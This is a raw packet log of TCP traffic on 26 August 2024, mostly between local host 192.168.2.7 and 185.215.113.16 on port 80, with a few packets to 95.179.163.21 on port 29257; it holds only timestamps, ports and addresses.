Aug 26, 2024 23:29:23.351485968 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359116077 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359127045 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359137058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359181881 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359210968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359217882 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359221935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359232903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359245062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359255075 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359256029 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359293938 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359294891 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359323025 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359333038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359343052 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359354973 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359366894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359376907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359390020 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359391928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359427929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.359982967 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.359992981 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360003948 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360061884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360061884 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360089064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360100031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360116005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360126019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360136986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360146046 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360146046 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360146999 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360157967 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360198021 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360198021 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360357046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360366106 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360380888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360393047 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360404015 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360411882 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360416889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360431910 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360441923 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360455036 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360554934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360565901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360575914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360582113 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360606909 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360616922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360627890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360632896 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360634089 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360641003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360660076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360671043 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360682011 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360707998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360726118 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360734940 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360737085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360749006 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360766888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360774994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360776901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.360802889 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360802889 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.360928059 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364038944 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364088058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364103079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364119053 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364145994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364161968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364171982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364182949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364195108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364213943 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364299059 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364887953 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364901066 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364912987 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364948034 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364959002 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364969015 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364972115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364972115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.364980936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.364995956 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.365039110 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.365463972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365474939 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365489006 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365540981 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.365540981 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.365550041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365560055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365571976 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365583897 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.365607977 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.365664959 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.371891975 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371913910 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371926069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371937037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371948957 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371961117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371973038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.371973991 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.371984959 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.372011900 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.372023106 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.373452902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373471022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373481035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373548031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373558044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373558044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.373569965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373580933 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.373625994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.373625994 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.441143036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.441159010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.441170931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.441251040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.441251993 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443041086 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443151951 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443212986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443332911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443346024 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443356991 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443367004 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443381071 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443386078 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443399906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443411112 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443411112 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443420887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443433046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443438053 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443444967 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443459034 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443459988 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443466902 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443521976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443521976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443552971 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443564892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443576097 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443607092 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443607092 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443624973 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443634987 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443643093 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443645000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443685055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443696022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443701029 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443707943 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443732977 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443732977 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443795919 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443806887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443818092 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443830967 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443835974 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443835974 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443841934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443850040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443854094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443866014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443897963 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443897963 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.443988085 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.443998098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.444010019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.444021940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.444025993 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.444056988 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.444164038 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.449862003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.449909925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.449920893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.449923992 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.449956894 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.449970007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.449980021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.449989080 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.449991941 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450030088 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450043917 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450047016 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450056076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450067043 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450076103 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450079918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450097084 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450103045 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450113058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.450129032 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450129032 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450166941 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450166941 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.450934887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451008081 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451024055 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451035023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451045036 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451062918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451073885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451076031 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451086044 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451164961 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451191902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451204062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451214075 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451225996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451241016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451251984 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451256037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451273918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451282978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451282978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451284885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451296091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451307058 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451314926 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451322079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451363087 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451374054 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451392889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451402903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451414108 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451428890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451440096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451451063 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451488018 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451488018 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451558113 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451567888 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451580048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451591969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.451615095 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.451697111 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.454672098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454693079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454704046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454727888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.454766035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454777002 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.454787016 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454799891 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454811096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454822063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.454830885 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.454879045 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.455132961 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.455471039 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455481052 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455497980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455508947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455519915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455539942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.455600977 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.455612898 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455625057 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455635071 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.455672979 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.455733061 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.456155062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456178904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456196070 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456207991 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456218958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456233978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.456305027 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.456321001 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456324100 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.456332922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.456343889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.457573891 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.462299109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462332964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462344885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462363958 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462368011 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.462374926 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462390900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462402105 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462408066 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.462413073 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.462476015 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.462495089 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.463927031 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.463952065 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.463960886 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.464006901 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.464024067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.464026928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.464035034 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.464046955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.464057922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.464118004 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.464121103 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.464149952 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.464276075 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.472951889 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.476934910 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:23.482985973 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.532164097 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532188892 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532200098 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532212019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532223940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532234907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532247066 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532255888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.532255888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.532258987 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532274961 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532284021 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.532288074 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532299042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.532306910 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.532335997 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.532392025 CEST	49734	80	192.168.2.7	185.215.113.16
